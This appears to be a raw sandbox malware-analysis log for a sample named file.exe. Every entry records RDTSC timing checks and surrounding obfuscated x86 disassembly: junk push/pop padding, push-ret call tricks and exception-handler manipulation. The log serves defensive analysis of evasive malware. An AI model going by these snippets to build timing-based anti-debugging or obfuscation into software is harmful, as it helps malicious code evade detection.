              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD0627 second address: AD0632 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FB10CD320F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE48D8 second address: AE48F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CBE4294h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE48F2 second address: AE48F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE4CE3 second address: AE4CF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CBE4290h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE4CF7 second address: AE4D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB10CD32103h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE4D13 second address: AE4D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB10CBE4286h 0x0000000a jmp 00007FB10CBE428Ah 0x0000000f popad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9707 second address: AE970D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE970D second address: AE9713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF198 second address: A9FF84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB10CD320FCh 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c jmp 00007FB10CD320FBh 0x00000011 pop ebx 0x00000012 nop 0x00000013 mov edx, dword ptr [ebp+122D5596h] 0x00000019 lea eax, dword ptr [ebp+12482F0Bh] 0x0000001f mov dword ptr [ebp+122D17A3h], ebx 0x00000025 nop 0x00000026 ja 00007FB10CD32104h 0x0000002c push eax 0x0000002d jmp 00007FB10CD320FEh 0x00000032 nop 0x00000033 sub edx, dword ptr [ebp+122D2D47h] 0x00000039 call dword ptr [ebp+1245890Dh] 0x0000003f push eax 0x00000040 push edx 0x00000041 jg 00007FB10CD320F8h 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF7E6 second address: ABF7EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF7EA second address: ABF7F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF7F0 second address: ABF7F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF7F6 second address: ABF7FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABFA56 second address: ABFA5C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABFA5C second address: ABFA89 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007FB10CD320F6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FB10CD32100h 0x00000012 xchg eax, esi 0x00000013 pushad 0x00000014 cmc 0x00000015 mov dword ptr [ebp+122D2FABh], edx 0x0000001b popad 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABFA89 second address: ABFA90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABFA90 second address: ABFA9A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB10CD320FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABFC5E second address: ABFC62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABFC62 second address: ABFC66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC01D7 second address: AC01DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC01DD second address: AC0228 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD32103h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sbb di, F270h 0x0000000f push 0000001Eh 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FB10CD320F8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b cld 0x0000002c adc edi, 07A324C2h 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0228 second address: AC0233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB10CBE4286h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0233 second address: AC0239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0239 second address: AC023D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC023D second address: AC0262 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007FB10CD32100h 0x00000010 jnc 00007FB10CD320F6h 0x00000016 popad 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACD5CF second address: ACD5D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE6EF second address: ACE6F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE6F3 second address: ACE701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FB10CBE4286h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF640 second address: ACF6CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD32102h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007FB10CD32102h 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D1C2Ch], edi 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov ebx, 32582368h 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a jg 00007FB10CD3210Eh 0x00000030 mov eax, dword ptr [ebp+122D0D21h] 0x00000036 mov dword ptr [ebp+122D55C6h], esi 0x0000003c push FFFFFFFFh 0x0000003e jmp 00007FB10CD32109h 0x00000043 nop 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push edi 0x00000049 pop edi 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF6CF second address: ACF6D5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF6D5 second address: ACF6F5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007FB10CD3210Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB10CD320FFh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD24EB second address: AD24F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB10CBE4286h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD24F6 second address: AD24FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD24FB second address: AD255C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sbb bx, 6EB3h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 add dword ptr [ebp+122D3818h], ecx 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 mov bh, D7h 0x00000027 mov eax, dword ptr [ebp+122D149Dh] 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007FB10CBE4288h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 movsx ebx, bx 0x0000004a push FFFFFFFFh 0x0000004c and bx, 6352h 0x00000051 push eax 0x00000052 pushad 0x00000053 push eax 0x00000054 jo 00007FB10CBE4286h 0x0000005a pop eax 0x0000005b push eax 0x0000005c push edx 0x0000005d push edx 0x0000005e pop edx 0x0000005f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC053B second address: AC0596 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB10CD320FEh 0x00000008 jmp 00007FB10CD320FCh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 jmp 00007FB10CD32107h 0x00000017 pop eax 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c pushad 0x0000001d jmp 00007FB10CD32109h 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0596 second address: AC05E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB10CBE428Ah 0x00000009 popad 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e js 00007FB10CBE4296h 0x00000014 jmp 00007FB10CBE4290h 0x00000019 push eax 0x0000001a pushad 0x0000001b popad 0x0000001c pop eax 0x0000001d popad 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jnl 00007FB10CBE429Fh 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC06F8 second address: AC074D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB10CD320F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D389Eh], edx 0x00000013 lea eax, dword ptr [ebp+12482F0Bh] 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007FB10CD320F8h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 mov ecx, 19D02D55h 0x00000038 nop 0x00000039 jg 00007FB10CD32100h 0x0000003f push eax 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 push ebx 0x00000044 pop ebx 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC074D second address: AA0AE1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push eax 0x00000009 jmp 00007FB10CBE4295h 0x0000000e pop ecx 0x0000000f call dword ptr [ebp+122D3682h] 0x00000015 push edx 0x00000016 jo 00007FB10CBE4288h 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jng 00007FB10CBE4286h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8B77 second address: AE8B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8B7B second address: AE8B8B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB10CBE4286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8B8B second address: AE8B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB10CD320FBh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8B9A second address: AE8BA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8E99 second address: AE8E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8E9E second address: AE8EA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8EA6 second address: AE8EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8EAA second address: AE8EB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9053 second address: AE9059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9059 second address: AE905D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE905D second address: AE9061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9061 second address: AE906F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FB10CBE4292h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE906F second address: AE9075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDD0A second address: AEDD0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDD0E second address: AEDD18 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB10CD320F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDD18 second address: AEDD21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDD21 second address: AEDD62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB10CD320F6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pop ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jo 00007FB10CD320F6h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b pushad 0x0000001c jng 00007FB10CD320F6h 0x00000022 jmp 00007FB10CD32107h 0x00000027 popad 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b pushad 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE030 second address: AEE035 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE035 second address: AEE03B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE03B second address: AEE047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE73A second address: AEE73E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE73E second address: AEE742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE742 second address: AEE74A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE74A second address: AEE754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FB10CBE4286h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE754 second address: AEE758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEEB97 second address: AEEBAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CBE428Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEED3C second address: AEED42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEED42 second address: AEED4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEED4C second address: AEED52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEED52 second address: AEED5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDA0B second address: AEDA37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FB10CD32100h 0x0000000a jne 00007FB10CD320F8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jl 00007FB10CD32127h 0x00000019 push eax 0x0000001a push edx 0x0000001b jng 00007FB10CD320F6h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDA37 second address: AEDA44 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB10CBE4286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF259E second address: AF25AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF25AA second address: AF25BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jnc 00007FB10CBE4286h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF25BF second address: AF25C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6FA4A second address: A6FA4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6FA4F second address: A6FA55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6FA55 second address: A6FA59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFE3DE second address: AFE402 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jl 00007FB10CD320F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FB10CD320FEh 0x00000014 jo 00007FB10CD320F6h 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B008BC second address: B008C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B008C2 second address: B008C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82288 second address: A8228E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B00488 second address: B004B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB10CD320F6h 0x0000000a jmp 00007FB10CD32107h 0x0000000f popad 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jnp 00007FB10CD320F6h 0x0000001a pop edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B004B5 second address: B004BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B03747 second address: B0374B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B031DD second address: B031E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09FD2 second address: B09FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB10CD320FFh 0x0000000e jc 00007FB10CD320F6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09FF0 second address: B09FF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09FF4 second address: B09FFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09FFE second address: B0A002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08999 second address: B0899E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0899E second address: B089A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08B05 second address: B08B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A715D1 second address: A715D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
